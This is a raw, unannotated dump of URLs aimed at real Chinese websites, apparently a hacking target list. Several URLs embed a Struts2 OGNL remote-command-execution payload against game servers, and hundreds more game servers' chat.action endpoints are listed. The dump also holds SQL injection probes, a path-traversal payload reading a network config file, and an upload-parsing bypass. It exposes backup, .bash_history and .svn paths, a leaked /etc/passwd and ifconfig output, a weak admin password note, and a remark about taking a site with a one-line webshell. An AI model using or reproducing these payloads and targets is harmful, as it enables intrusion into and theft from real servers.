http://lottery.sports.sohu.com/esunmanage/Admin/Tpl/default/Index/ http://lottery.sports.sohu.com/esunmanage/Admin/index.php/Public/login http://www.che168.com/Personal/Buy_46407.html?22:47:02 http://terminal.chinaef.com/system/defaultLogin.action http://www.glqh.com/login/Jeecms.do http://shuping.hjsm.tom.com/js/fckeditor/editor/filemanager/connectors/test.html# http://27.115.28.248:8066/WebResource.axd?d=4mc-jQVbXmJ0NXBf42LyLA2&t=634540161289277627 http://27.115.28.248:8066/WebResource.axd?d=meB-ylNiPxIKJ9u6Gwq788rr2avhLzUrwXgJ0KofnAA1&t=634540161289277627 http://27.115.28.248:8066/WebResource.axd?d=4mc-jQVbXmJ0NXBf42LyLA2 http://hters.htinns.com/HTERS/WebResource.axd?d=AaGjA0eJsGoyRvmFPN8ttw2 http://hters.htinns.com/HTERS/ScriptResource.axd http://pan.baidu.com/share/link?shareid=532369&uk=1594048901 http://jcxt.htinns.com/WebResource.axd?d=GecXR2RIyY_JNrCvsOavmQ2&t=634606828247982112 http://jcxt.htinns.com/WebResource.axd?d=GecXR2RIyY_JNrCvsOavmQ2 http://jcxt.htinns.com/ScriptResource.axd http://qpb.eastday.com http://qpb.eastday.com/index.asp http://qpb.eastday.com/data/dbbak/ http://data.news.163.com/cacti/cacti.sql http://data.news.163.com/htdocs/.bash_history http://data.news.163.com:80/htdocs/.svn/entries http://stat.verycd.com/admin/ http://stat.verycd.com/admin/easymule/index.php?between=date&b_le=2013-07-14&b_ge=2013-07-14 http://www.xd.com/hr/?author=1 http://www.dfyb.com http://www.dfyb.com/newcenter/Newscenter_Detail.asp?news_id=179 http://www.xfj.suzhou.gov.cn http://www.xfj.suzhou.gov.cn/1937cN.txt http://wbxq.gov.cn http://wbxq.gov.cn/1937cN.txt http://xxgk.zhumadian.gov.cn http://xxgk.zhumadian.gov.cn/1937cN.txt http://oa.zhangye.gov.cn http://oa.zhangye.gov.cn//1937cN.txt http://lzhx.czolgame.com/bbs/admin.php http://es.ucweb.com/wor/my_brand?product_id=21870&type=0&la= http://minisite.youku.com/autobaojun/view.php?id=1189 http://s58.as.game.yy.com/root/chat.action?class.classLoader.jarPath=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3d+new+java.lang.Boolean%28false%29%2c+%23_memberAccess[%22allowStaticMethodAccess%22]%3dtrue%2c+%23a%3d%40java.lang.Runtime%40getRuntime%28%29.exec%28%27/sbin/ifconfig%20-a%27%29.getInputStream%28%29%2c%23b%3dnew+java.io.InputStreamReader%28%23a%29%2c%23c%3dnew+java.io.BufferedReader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23s3cur1ty%3d%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2c%23s3cur1ty.println%28%23d%29%2c%23s3cur1ty.close%28%29%29%28aa%29&x[%28class.classLoader.jarPath%29%28%27aa%27%29 http://astd22.my4399.com/root/chat.action http://astd26.g.pps.tv/root/chat.action http://astd27.g.pps.tv/root/chat.action http://gameas4.pipi.cn/root/chat.action http://s1.as.8zy.com/root/chat.action http://s17.as.jinjuzi.com/root/chat.action http://s4.as.91.com/root/chat.action http://s4.astd.wan.rising.cn/root/chat.action http://s4.asyh.uoyoo.cn/root/chat.action http://s69.astd.6711.com/root/chat.action http://s7.astd.ifeng.com/root/chat.action http://td6.huanlang.com/root/chat.action http://td8.zhulang.com/root/chat.action http://as1.game.tiexue.net/root/chat.action http://astd.s1.53wan.com/root/chat.action http://s66.as.peiyou.com/root/chat.action http://as1.51wan.com/root/chat.action http://astd17.29ww.com/root/chat.action http://s319.as.yaowan.com/root/chat.action http://s622.as.yaowan.com/root/chat.action http://s11.astd.cga.com.cn/root/chat.action http://s167.as.yaowan.com/root/chat.action http://s3.astd.g.pptv.com/root/chat.action http://s588.as.yaowan.com/root/chat.action http://s80.astd.6711.com/root/chat.action http://astd10.youxi567.com/root/chat.action http://s1.3896.com/root/chat.action http://s28.astd.6711.com/root/chat.action http://s69.as.yaowan.com/root/chat.action http://s77.astd.6711.com/root/chat.action http://as2.neotv.jiuwan.com/root/chat.action http://s116.astd.37wan.com/root/chat.action http://s184.as.yaowan.com/root/chat.action http://s605.as.yaowan.com/root/chat.action http://x16.aoshi.renren.com/root/chat.action http://s1.as.158wan.com/root/chat.action http://s26.astd.37wan.com/root/chat.action http://s328.as.yaowan.com/root/chat.action http://s577.as.yaowan.com/root/chat.action http://s89.as.peiyou.com/root/chat.action http://x4.aoshi.renren.com/root/chat.action http://astd1.youxi567.com/root/chat.action http://astds8.snsfun.com/root/chat.action http://s1.as.96pk.com/root/chat.action http://s111.as.yaowan.com/root/chat.action http://s15.astd.kuwo.cn/root/chat.action http://s397.as.yaowan.com/root/chat.action http://s42.as.game.yy.com/root/chat.action http://s603.as.yaowan.com/root/chat.action http://astd.s5.53wan.com/root/chat.action http://s1.astd.smggame.net/root/chat.action http://s573.as.yaowan.com/root/chat.action http://s6.as.pcgames.com.cn/root/chat.action http://gameas1.pipi.cn/root/chat.action http://s2.astd.cga.com.cn/root/chat.action http://s298.as.yaowan.com/root/chat.action http://s59.as.yaowan.com/root/chat.action http://x12.aoshi.renren.com/root/chat.action http://x14.aoshi.renren.com/root/chat.action http://s1.as.aoshitang.com/root/chat.action http://s1.astd.6one.com.cn/root/chat.action http://s1.astd.91555.com/root/chat.action http://s123.as.yaowan.com/root/chat.action http://s17.astd.g.1360.com/root/chat.action http://s3.as.jinjuzi.com/root/chat.action http://s52.astd.6711.com/root/chat.action http://s585.as.yaowan.com/root/chat.action http://s8.astd.51.com/root/chat.action http://s92.astd.37wan.com/root/chat.action http://assvr1.webgame.xunlei.com/root/chat.action http://s16.as.56uu.com/root/chat.action http://s163.as.yaowan.com/root/chat.action http://s28.as.peiyou.com/root/chat.action http://s75.astd.37wan.com/root/chat.action http://res9.astd.cn/root/chat.action http://s101.as.yaowan.com/root/chat.action http://s6.astd.6711.com/root/chat.action http://td1.huanlang.com/root/chat.action http://x21.aoshi.renren.com/root/chat.action http://astd06.game.qidian.com/root/chat.action http://astd3.29ww.com/root/chat.action http://astds1.snsfun.com/root/chat.action http://s01.as.3722.com/root/chat.action http://s32.baidu.astd.cn/root/chat.action http://s62.as.game.yy.com/root/chat.action http://astd07.game.qidian.com/root/chat.action http://s103.as.yaowan.com/root/chat.action http://s534.as.yaowan.com/root/chat.action http://s94.astd.6711.com/root/chat.action http://s18.as.game.yy.com/root/chat.action http://s613.as.yaowan.com/root/chat.action http://frxxz11.game.bnbwan.com/root/chat.action http://frxxz12.game.bnbwan.com/root/chat.action http://s17.baidu.astd.cn/root/chat.action http://s621.as.yaowan.com/root/chat.action http://s95.as.peiyou.com/root/chat.action http://td09.jianggame.com/root/chat.action http://td23.zhulang.com/root/chat.action http://s34.astd.6711.com/root/chat.action http://s427.as.yaowan.com/root/chat.action http://s608.as.yaowan.com/root/chat.action http://s79.as.yaowan.com/root/chat.action http://s9.as.56uu.com/root/chat.action http://td17.zhulang.com/root/chat.action http://5.astd.youwo.com/root/chat.action http://s1.astd.kuwo.cn/root/chat.action http://astd09.game.qidian.com/root/chat.action http://s10.astd.cga.com.cn/root/chat.action http://s2.astd.tianya.cn/root/chat.action http://s59.as.peiyou.com/root/chat.action http://s632.as.yaowan.com/root/chat.action http://s9.astd.cga.com.cn/root/chat.action http://x1.aoshi.renren.com/root/chat.action http://astd44.g.pps.tv/root/chat.action http://hs35.as.yaowan.com/root/chat.action http://s32.astd.g.1360.cn/root/chat.action http://s32.astd.g.1360.com/root/chat.action http://s56.as.peiyou.com/root/chat.action http://s582.as.yaowan.com/root/chat.action http://s66.as.game.yy.com/root/chat.action http://td001.webxgame.com/root/chat.action http://td50.zhulang.com/root/chat.action http://x20.aoshi.renren.com/root/chat.action http://s2.frxx.qidian.com/root/chat.action http://s3.frxx.qidian.com/root/chat.action http://s82.as.yaowan.com/root/chat.action http://s8.frxx.qidian.com/root/chat.action http://s9.frxx.qidian.com/root/chat.action http://s616.as.yaowan.com/root/chat.action http://s77.as.yaowan.com/root/chat.action http://tdh1.kuwan8.com/root/chat.action http://wap.astd.cn/root/chat.action http://118.26.234.23/root/chat.action http://s241.as.yaowan.com/root/chat.action http://s479.as.yaowan.com/root/chat.action http://s66.astd.37wan.com/root/chat.action http://s211.as.yaowan.com/root/chat.action http://s280.as.yaowan.com/root/chat.action http://s5.as.kugou.com/root/chat.action http://s629.as.yaowan.com/root/chat.action http://s89.as.yaowan.com/root/chat.action http://s7.frxx.qidian.com/root/chat.action http://s482.as.yaowan.com/root/chat.action http://s71.astd.37wan.com/root/chat.action http://s91.as.peiyou.com/root/chat.action http://s126.astd.37wan.com/root/chat.action http://s169.as.yaowan.com/root/chat.action http://s82.as.peiyou.com/root/chat.action http://s93.as.game.yy.com/root/chat.action http://118.26.234.28/root/chat.action http://s129.as.yaowan.com/root/chat.action http://s130.as.yaowan.com/root/chat.action http://s24.as.womenwan.com/root/chat.action http://astds3.snsfun.com/root/chat.action http://s561.as.yaowan.com/root/chat.action http://s72.as.game.yy.com/root/chat.action http://s78.as.peiyou.com/root/chat.action http://astd24.g.pps.tv/root/chat.action http://s1.astd.ifeng.com/root/chat.action http://s10.as.8zy.com/root/chat.action http://s100.as.yaowan.com/root/chat.action http://s2.astd.6one.com.cn/root/chat.action http://s2.astd.wan.rising.cn/root/chat.action http://s7.as.aoshitang.com/root/chat.action http://s7.as.jiuwan.com/root/chat.action http://s99.as.yaowan.com/root/chat.action http://td30.huanlang.com/root/chat.action http://td37.jianggame.com/root/chat.action http://x19.aoshi.renren.com/root/chat.action http://s93.as.yaowan.com/root/chat.action http://s94.as.yaowan.com/root/chat.action http://s134.as.yaowan.com/root/chat.action http://s132.astd.37wan.com/root/chat.action http://s204.as.yaowan.com/root/chat.action http://s205.as.yaowan.com/root/chat.action http://s612.as.yaowan.com/root/chat.action http://s232.as.yaowan.com/root/chat.action http://s50.as.game.yy.com/root/chat.action http://s54.astd.6711.com/root/chat.action http://s57.as.peiyou.com/root/chat.action http://astd25.g.pps.tv/root/chat.action http://hs35.as.yaowan.com/root/chat.action http://s10-x.as.178.com/root/chat.action http://s136.as.yaowan.com/root/chat.action http://s28.astd.g.1360.com/root/chat.action http://s5.3896.com/root/chat.action http://s82.as.game.yy.com/root/chat.action http://s104.as.peiyou.com/root/chat.action http://s29.as.aoshitang.com/root/chat.action http://s29.as.jiuwan.com/root/chat.action http://s373.as.yaowan.com/root/chat.action http://s56.astd.37wan.com/root/chat.action http://as1.game.verycd.com/root/chat.action http://astd34.g.pps.tv/root/chat.action http://s41.as.aoshitang.com/root/chat.action http://s58.as.peiyou.com/root/chat.action http://s625.as.yaowan.com/root/chat.action http://td31.huanlang.com/root/chat.action http://s1.astd.g.pptv.com/root/chat.action http://s13.as.womenwan.com/root/chat.action http://s443.as.yaowan.com/root/chat.action http://s52.as.game.yy.com/root/chat.action http://s596.as.yaowan.com/root/chat.action http://s79.astd.6711.com/root/chat.action http://s8.astd.game2.com.cn/root/chat.action http://astd1.uusee.com/root/chat.action http://s170.as.yaowan.com/root/chat.action http://s3.astd.51.com/root/chat.action http://s265.as.yaowan.com/root/chat.action http://s266.as.yaowan.com/root/chat.action http://astd1.78bar.com/root/chat.action http://astds5.snsfun.com/root/chat.action http://s105.as.yaowan.com/root/chat.action http://s4.astd.6711.com/root/chat.action http://s46.as.aoshitang.com/root/chat.action http://as901.51wan.com/root/chat.action http://s1.as.kugou.com/root/chat.action http://s139.as.yaowan.com/root/chat.action http://s140.as.yaowan.com/root/chat.action http://s38.astd.6711.com/root/chat.action http://s1.astd.51.com/root/chat.action http://s510.as.yaowan.com/root/chat.action http://s29.astd.game2.com.cn/root/chat.action http://s48.as.aoshitang.com/root/chat.action http://s50.astd.37wan.com/root/chat.action http://s103.astd.37wan.com/root/chat.action http://s14.as.jiuwan.com/root/chat.action http://s38.astd.g.1360.com/root/chat.action http://s551.as.yaowan.com/root/chat.action http://as14.xdwan.com/root/chat.action http://s549.as.yaowan.com/root/chat.action http://s1.astd.37wan.com/root/chat.action http://s16.as.yaowan.com/root/chat.action http://s39.as.peiyou.com/root/chat.action http://s611.as.yaowan.com/root/chat.action http://s10.as.91.com/root/chat.action http://s122.astd.37wan.com/root/chat.action http://s4.astd.g.pptv.com/root/chat.action http://s521.as.yaowan.com/root/chat.action http://s576.as.yaowan.com/root/chat.action http://td62.webxgame.com/root/chat.action http://s3.as.yaowan.com/root/chat.action http://s6.astd.g.1360.com/root/chat.action http://as1.neotv.jiuwan.com/root/chat.action http://astd29.g.pps.tv/root/chat.action http://astd9.uusee.com/root/chat.action http://s1.as.uc55.cn/root/chat.action http://s1.astd.g.1360.com/root/chat.action http://s11.astd.ifeng.com/root/chat.action http://s143.as.yaowan.com/root/chat.action http://s35.as.aoshitang.com/root/chat.action http://s592.as.yaowan.com/root/chat.action http://s6.astd.baofenggame.com/root/chat.action http://s6.astd.wan.rising.cn/root/chat.action http://s70.as.game.yy.com/root/chat.action http://as17.xdwan.com/root/chat.action http://s145.as.yaowan.com/root/chat.action http://s464.as.yaowan.com/root/chat.action http://s83.astd.37wan.com/root/chat.action http://s88.as.yaowan.com/root/chat.action http://astd01.game.qidian.com/root/chat.action http://s1.as.womenwan.com/root/chat.action http://s124.as.womenwan.com/root/chat.action http://s421.as.yaowan.com/root/chat.action http://s571.as.yaowan.com/root/chat.action http://s20.as.56uu.com/root/chat.action http://s497.as.yaowan.com/root/chat.action http://s78.as.game.yy.com/root/chat.action http://s1.astd.snstele.com/root/chat.action http://s22.as.yaowan.com/root/chat.action http://s590.as.yaowan.com/root/chat.action http://td25.huanlang.com/root/chat.action http://as3.neotv.jiuwan.com/root/chat.action http://s1.as.3737.com/root/chat.action http://s188.as.yaowan.com/root/chat.action http://s40.as.peiyou.com/root/chat.action http://s40.as.womenwan.com/root/chat.action http://s595.as.yaowan.com/root/chat.action http://s1.kaixin.astd.cn/root/chat.action http://s539.as.yaowan.com/root/chat.action http://s80.as.peiyou.com/root/chat.action http://s171.as.yaowan.com/root/chat.action http://s32.as.peiyou.com/root/chat.action http://x7.aoshi.renren.com/root/chat.action http://s1.astd.niua.com/root/chat.action http://s5.as.womenwan.com/root/chat.action http://s620.as.yaowan.com/root/chat.action http://s9-x.as.178.com/root/chat.action http://s148.as.yaowan.com/root/chat.action http://s525.as.yaowan.com/root/chat.action http://s113.astd.37wan.com/root/chat.action http://s352.as.yaowan.com/root/chat.action http://s574.as.yaowan.com/root/chat.action http://td15.webxgame.com/root/chat.action http://astd.s3.53wan.com/root/chat.action http://s455.as.yaowan.com/root/chat.action http://s103.as.peiyou.com/root/chat.action http://s50.as.56uu.com/root/chat.action http://s500.as.yaowan.com/root/chat.action http://s609.as.yaowan.com/root/chat.action http://s14.astd.37wan.com/root/chat.action http://s1-x.as.178.com/root/chat.action http://s75.as.yaowan.com/root/chat.action http://s8.as.91.com/root/chat.action http://s514.as.yaowan.com/root/chat.action http://s560.as.yaowan.com/root/chat.action http://td5.zhulang.com/root/chat.action http://s1.baidu.astd.cn/root/chat.action http://s1.weibo.astd.cn/root/chat.action http://s133.as.yaowan.com/root/chat.action http://s1.astd.cga.com.cn/root/chat.action http://s1.astd.uz73.com/root/chat.action http://s2.astd.cga.com.cn/root/chat.action http://s30.as.jinjuzi.com/root/chat.action http://s34.astd.37wan.com/root/chat.action http://as15.51wan.com/root/chat.action http://as16.xdwan.com/root/chat.action http://s1.astd.ipark.cn/root/chat.action http://s107.as.peiyou.com/root/chat.action http://s155.as.yaowan.com/root/chat.action http://s384.as.yaowan.com/root/chat.action http://as1.xdwan.com/root/chat.action http://s30.baidu.astd.cn/root/chat.action http://s512.as.yaowan.com/root/chat.action http://s76.as.peiyou.com/root/chat.action http://s77.as.game.yy.com/root/chat.action http://s12.astd.cga.com.cn/root/chat.action http://s406.as.yaowan.com/root/chat.action http://s530.as.yaowan.com/root/chat.action http://s607.as.yaowan.com/root/chat.action http://td41.zhulang.com/root/chat.action http://s433.as.yaowan.com/root/chat.action http://s1.as.pcgames.com.cn/root/chat.action http://s244.as.yaowan.com/root/chat.action http://s31.astd.game2.com.cn/root/chat.action http://s40.astd.g.1360.com/root/chat.action http://s108.as.game.yy.com/root/chat.action http://s248.as.yaowan.com/root/chat.action http://s34.astd.g.1360.com/root/chat.action http://s45.as.aoshitang.com/root/chat.action http://s62.as.peiyou.com/root/chat.action http://as44.xdwan.com/root/chat.action http://s34.as.game.yy.com/root/chat.action http://td59.zhulang.com/root/chat.action http://s13.astd.kuwo.cn/root/chat.action http://s470.as.yaowan.com/root/chat.action http://td89.webxgame.com/root/chat.action http://s115.as.yaowan.com/root/chat.action http://s116.as.yaowan.com/root/chat.action http://s24.astd.game2.com.cn/root/chat.action http://s49.astd.6711.com/root/chat.action http://s51.as.aoshitang.com/root/chat.action http://as1.29293.com/root/chat.action http://astd20.g.pps.tv/root/chat.action http://s01.as.175pt.net/root/chat.action http://s11.as.8zy.com/root/chat.action http://s12.as.aoshitang.com/root/chat.action http://s3.asyh.uoyoo.cn/root/chat.action http://s579.as.yaowan.com/root/chat.action http://s7-x.as.178.com/root/chat.action http://s-9.as.jinjuzi.com/root/chat.action http://as1.91wan.com/root/chat.action http://s41.as.yaowan.com/root/chat.action http://s5.astd.cga.com.cn/root/chat.action http://s11-x.as.178.com/root/chat.action http://s1-2.astd.kuaiwan.com/root/chat.action http://s208.as.yaowan.com/root/chat.action http://s9.as.kugou.com/root/chat.action http://td18.huanlang.com/root/chat.action http://s119.as.yaowan.com/root/chat.action http://s68.as.game.yy.com/root/chat.action http://td86.webxgame.com/root/chat.action http://s200.as.yaowan.com/root/chat.action http://s33.baidu.astd.cn/root/chat.action http://s46.as.peiyou.com/root/chat.action http://s507.as.yaowan.com/root/chat.action http://s1.astd.funshion.com/root/chat.action http://s15.3896.com/root/chat.action http://s511.as.yaowan.com/root/chat.action http://s57.as.yaowan.com/root/chat.action http://s578.as.yaowan.com/root/chat.action http://astd14.g.pps.tv/root/chat.action http://s1.astd.game2.com.cn/root/chat.action http://astd19.g.pps.tv/root/chat.action http://s1.as.yaowan.com/root/chat.action http://s53.as.aoshitang.com/root/chat.action http://s85.astd.6711.com/root/chat.action http://astds11.snsfun.com/root/chat.action http://s391.as.yaowan.com/root/chat.action http://x23.aoshi.renren.com/root/chat.action http://s11.astd.51.com/root/chat.action http://s147.as.peiyou.com/root/chat.action http://s182.as.yaowan.com/root/chat.action http://s36.astd.g.1360.com/root/chat.action http://s518.as.yaowan.com/root/chat.action http://td17.webxgame.com/root/chat.action http://s100.astd.37wan.com/root/chat.action http://s499.as.yaowan.com/root/chat.action http://s8.astd.6711.com/root/chat.action http://s27.as.56uu.com/root/chat.action http://s4-x.as.178.com/root/chat.action http://s584.as.yaowan.com/root/chat.action http://s601.as.yaowan.com/root/chat.action http://s11.astd.kuwo.cn/root/chat.action http://s165.as.yaowan.com/root/chat.action http://s532.as.yaowan.com/root/chat.action http://astd.s2.53wan.com/root/chat.action http://s1.as.kedou.com/root/chat.action http://s630.as.yaowan.com/root/chat.action http://td1.zhulang.com/root/chat.action http://s1.as.feixue.com/root/chat.action http://s25.baidu.astd.cn/root/chat.action http://s43.as.aoshitang.com/root/chat.action http://s558.as.yaowan.com/root/chat.action http://s13-x.as.178.com/root/chat.action http://s253.as.yaowan.com/root/chat.action http://s58.as.game.yy.com/root/chat.action http://td13.zhulang.com/root/chat.action http://s27.baidu.astd.cn/root/chat.action http://s45.astd.6711.com/root/chat.action http://s536.as.yaowan.com/root/chat.action http://s54.as.game.yy.com/root/chat.action http://td56.zhulang.com/root/chat.action http://s223.as.yaowan.com/root/chat.action http://s3.astd.cga.com.cn/root/chat.action http://s545.as.yaowan.com/root/chat.action http://s277.as.yaowan.com/root/chat.action http://s540.as.yaowan.com/root/chat.action http://s566.as.yaowan.com/root/chat.action http://s9.3896.com/root/chat.action http://www.dreamore.com/projects?type=3%20and%201=2 http://www.dreamore.com/dreamblog?type=4%20and%201=2 http://www.dreamore.com/projects?keywords=1%20and%201=2 URL:http://www.isstec.org.cn/index.php/Index/listcert/certype/注入点 http://ykt.10086.cn/APC/Index.html http://218.206.27.3/CMOC/default.aspx?area=20 http://www.todaynic.com) http://www.uvip.cn/ http://www.uvip.cn/处进行登录 http://account.9aoduo.com/register/register.action encap:Ethernet B8:AC:6F:94:C8:DF addr:192.168.165.48 Bcast:192.168.165.255 Mask:255.255.255.0 MTU:1500 packets:14502378890 packets:19444044575 txqueuelen:1000 http://www.lkwan.com/phone/about/disclaimer.action root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin avahi-autoipd:x:170:170:Avahi Stack:/var/lib/avahi-autoipd:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rtkit:x:499:497:RealtimeKit:/proc:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin hsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologin saslauth:x:498:496:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin radvd:x:75:75:radvd user:/:/sbin/nologin avahi:x:70:70:Avahi Stack:/var/run/avahi-daemon:/sbin/nologin pulse:x:497:495:PulseAudio Daemon:/var/run/pulse:/sbin/nologin gdm:x:42:42::/var/lib/gdm:/sbin/nologin qemu:x:107:107:qemu user:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin bp:x:500:501:bp:/home/bp:/bin/bash test:x:501:502::/home/test:/bin/bash nginx:x:502:503::/home/nginx:/sbin/nologin system:x:0:0::/tmpo:/bin/bash http://117.79.149.40/ http://www.aoshitang.com/login.action?class.classLoader.jarPath=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3d+new+java.lang.Boolean%28false%29%2c+%23_memberAccess[%22allowStaticMethodAccess%22]%3dtrue%2c+%23a%3d%40java.lang.Runtime%40getRuntime%28%29.exec%28%27/sbin/ifconfig%20-a%27%29.getInputStream%28%29%2c%23b%3dnew+java.io.InputStreamReader%28%23a%29%2c%23c%3dnew+java.io.BufferedReader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23s3cur1ty%3d%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2c%23s3cur1ty.println%28%23d%29%2c%23s3cur1ty.close%28%29%29%28aa%29&x[%28class.classLoader.jarPath%29%28%27aa%27%29 http://as.aoshitang.com/validatecode.xhtml?class.classLoader.jarPath=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3d+new+java.lang.Boolean%28false%29%2c+%23_memberAccess[%22allowStaticMethodAccess%22]%3dtrue%2c+%23a%3d%40java.lang.Runtime%40getRuntime%28%29.exec%28%27/sbin/ifconfig%20-a%27%29.getInputStream%28%29%2c%23b%3dnew+java.io.InputStreamReader%28%23a%29%2c%23c%3dnew+java.io.BufferedReader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23s3cur1ty%3d%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2c%23s3cur1ty.println%28%23d%29%2c%23s3cur1ty.close%28%29%29%28aa%29&x[%28class.classLoader.jarPath%29%28%27aa%27%29 http://www.zzsf.com/validatecode.xhtml?class.classLoader.jarPath=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3d+new+java.lang.Boolean%28false%29%2c+%23_memberAccess[%22allowStaticMethodAccess%22]%3dtrue%2c+%23a%3d%40java.lang.Runtime%40getRuntime%28%29.exec%28%27/sbin/ifconfig%20-a%27%29.getInputStream%28%29%2c%23b%3dnew+java.io.InputStreamReader%28%23a%29%2c%23c%3dnew+java.io.BufferedReader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23s3cur1ty%3d%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2c%23s3cur1ty.println%28%23d%29%2c%23s3cur1ty.close%28%29%29%28aa%29&x[%28class.classLoader.jarPath%29%28%27aa%27%29 http://mj.aoshitang.com/validatecode.xhtml?class.classLoader.jarPath=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3d+new+java.lang.Boolean%28false%29%2c+%23_memberAccess[%22allowStaticMethodAccess%22]%3dtrue%2c+%23a%3d%40java.lang.Runtime%40getRuntime%28%29.exec%28%27/sbin/ifconfig%20-a%27%29.getInputStream%28%29%2c%23b%3dnew+java.io.InputStreamReader%28%23a%29%2c%23c%3dnew+java.io.BufferedReader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23s3cur1ty%3d%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2c%23s3cur1ty.println%28%23d%29%2c%23s3cur1ty.close%28%29%29%28aa%29&x[%28class.classLoader.jarPath%29%28%27aa%27%29 http://www.channelsoft.com/casedetail.jsp?type=0&contentid=15 http://www.channelsoft.com/casedetail.jsp?type=0&contentid=15 http://www.channelsoft.com/casedetail.jsp?type=0&contentid=15 http://mobile.youku.com/index/wireless http://www.rhedu.gov.cn/zhuanti/xueke/default.aspx?FID=59 http://www.rhedu.gov.cn/zhuanti/mingshi/default.aspx?FID=62 http://www.xwjy.org/tresearch/wgindex.jsp?cid=00025&wgid=WG_186150 http://www.xlzx.sdu.edu.cn/jpkc/pass.php?pid=1055 http://www.xlzx.sdu.edu.cn/jpkc/pass.php?pid=1055 minisite.youku.com/myicetea/view.php http://218.3.204.146:7001/wscxxuzhou/ http://218.3.204.146:7001/console http://bbs.aoshitang.com http://bbs.aoshitang.com/thread-813631-93.html http://hfwap.mywtv.cn/jttq.do http://show.mywtv.cn/index.php?p=6&s=01'%20and%20'1'='1 http://plugin.mywtv.cn/weatherPub/WeatherIframeService?siteKey=/../../../..//etc/sysconfig/network-scripts/ifcfg-eth0%00 http://hudong.mywtv.cn/xiuba/attachment/201305/30/28374_1369898591O0QQ.jpg.thumb.jpg/.php http://yjszs.hfut.edu.cn/news.php?id=188 http://archives.lzu.edu.cn/pub/search/default.asp?id=10): http://dawww.nju.edu.cn/dazngl/New_Folder_index/dxyh-1.htm http://gc.astd.cn/AstdGateway/validateCode.action?_dc=1373816329043 http://gc.zzsf.com/ZzGateway/login.action?login_error=1 http://www.game-reign.com/validateCode.action?class.classLoader.jarPath=%28%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3d+new+java.lang.Boolean%28false%29%2c+%23_memberAccess[%22allowStaticMethodAccess%22]%3dtrue%2c+%23a%3d%40java.lang.Runtime%40getRuntime%28%29.exec%28%27/sbin/ifconfig%20-a%27%29.getInputStream%28%29%2c%23b%3dnew+java.io.InputStreamReader%28%23a%29%2c%23c%3dnew+java.io.BufferedReader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23s3cur1ty%3d%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2c%23s3cur1ty.println%28%23d%29%2c%23s3cur1ty.close%28%29%29%28aa%29&x[%28class.classLoader.jarPath%29%28%27aa%27%29 http://ww.gic.ac.cn/gic_news/list.php?type=1 http://klpr.ibcas.ac.cn/admin/index.asp http://www.ems.com.cn/ec-web/register/register_toIndex.action http://hjhx.rcees.ac.cn/hjhx/loginAction.action http://219.136.241.241:15004/xdf!gotoOrder.action?ptype=iphone5 http://219.136.241.241:15004/login.jsp后台弱口令admin http://www.jiankongbao.com/server_create.php?server_id=1 http://www.jiankongbao.com/server_create.php?server_id=2 http://www.jiankongbao.com/server_create.php?server_id=9 http://www.tianjingas.com/tjsinfo/index/index.action http://www.tianjin-air.com/en/login.action?request_locale=en_US http://www.superdata.com.cn/ http://www.superdata.com.cn/hack.txt http://old.superdata.com.cn/直接EXP拿下一句话木马。 http://report.tianjin-air.com/frontend/nonreg/nonRegLogin.action http://et.tianjin-air.com/flight/multiway.action http://www.aoshitang.com/WEB-INF/web.xml http://xlfc.changyou.com/shop/article!list.action?id=8a861a5e3e3118d1013e311b12360003 http://rzzx.kingdee.com/student/woeldtdetail.do?id=3 http://www.cgirls.cn/cgirl.php?type=%e8%bf%b7%e4%ba%ba%e6%80%a7%e6%84%9f http://www.cgirls.cn/cgirl.php?type=%e8%bf%b7%e4%ba%ba%e6%80%a7%e6%84%9f http://www.cgirls.cn/cgirl.php?type=%e8%bf%b7%e4%ba%ba%e6%80%a7%e6%84%9f 